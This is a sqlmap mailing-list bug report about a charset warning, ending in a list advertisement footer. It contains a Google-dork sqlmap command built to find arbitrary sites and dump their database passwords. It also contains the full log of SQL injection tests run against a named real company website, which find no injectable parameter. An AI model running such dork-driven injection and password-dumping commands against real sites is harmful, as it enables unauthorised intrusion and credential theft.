*Reporting*
[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
e-mail to sqlmap-users@lists.sourceforge.net.
*Command*
sqlmap -g inurl:"showpro.asp?id=" --random-agent --batch --passwords
*Terminal Readout*
GET http://www.sh-sinap.com/en/Showpro.asp?id=6
do you want to test this URL? [Y/n/q]
> Y
[20:21:30] [INFO] testing URL 'http://www.sh-sinap.com/en/Showpro.asp?id=6'
[20:21:40] [INFO] testing connection to the target URL
[20:21:46] [INFO] testing if the target URL is stable. This can take a
couple of seconds
[20:21:50] [INFO] target URL is stable
[20:21:50] [INFO] testing if GET parameter 'id' is dynamic
[20:21:51] [WARNING] GET parameter 'id' does not appear dynamic
[20:21:52] [WARNING] heuristic (basic) test shows that GET parameter 'id'
might not be injectable
[20:21:52] [INFO] testing for SQL injection on GET parameter 'id'
[20:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
*[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
e-mail to sqlmap-users@lists.sourceforge.net
<sqlmap-users@lists.sourceforge.net>.*
[20:21:53] [INFO] heuristics detected web page charset 'GB2312'
[20:22:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
clause'
[20:22:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
clause'
[20:22:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
WHERE or HAVING clause'
[20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause
(XMLType)'
[20:22:46] [INFO] testing 'MySQL inline queries'
[20:22:47] [INFO] testing 'PostgreSQL inline queries'
[20:22:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:22:53] [INFO] testing 'Oracle inline queries'
[20:22:55] [INFO] testing 'SQLite inline queries'
[20:22:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:22:56] [CRITICAL] there is considerable lagging in connection
response(s). Please use as high value for option '--time-sec' as possible
(e.g. 10 or more)
[20:23:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[20:23:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[20:23:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:23:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
sqlmap got a 302 redirect to 'http://www.sh-sinap.com:80/en/Showpro.asp'.
Do you want to follow? [Y/n] Y
[20:23:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:23:47] [INFO] testing 'Oracle AND time-based blind'
[20:24:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:25:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:25:38] [WARNING] using unescaped version of the test because of zero
knowledge of the back-end DBMS. You can try to explicitly set it using
option '--dbms'
[20:27:14] [CRITICAL] connection timed out to the target URL or proxy.
sqlmap is going to retry the request
[20:27:45] [CRITICAL] connection timed out to the target URL or proxy.
sqlmap is going to retry the request
[20:28:16] [CRITICAL] connection timed out to the target URL or proxy.
sqlmap is going to retry the request
[20:28:47] [CRITICAL] connection timed out to the target URL or proxy
[20:29:10] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection
phase/(n)ext parameter/(c)hange verbosity/(q)uit] n
[20:29:22] [WARNING] GET parameter 'id' is not injectable
[20:29:22] [ERROR] all tested parameters appear to be not injectable. Try
to increase '--level'/'--risk' values to perform more tests. Also, you can
try to rerun by providing either a valid value for option '--string' (or
'--regexp'), skipping to the next URL
[20:29:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 15 times
Regards
Dan
------------------------------------------------------------------------------
One dashboard for servers and applications across Physical-Virtual-Cloud
Widest out-of-the-box monitoring support with 50+ applications
Performance metrics, stats and reports that give you Actionable Insights
Deep dive visibility with transaction tracing using APM Insight.
http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
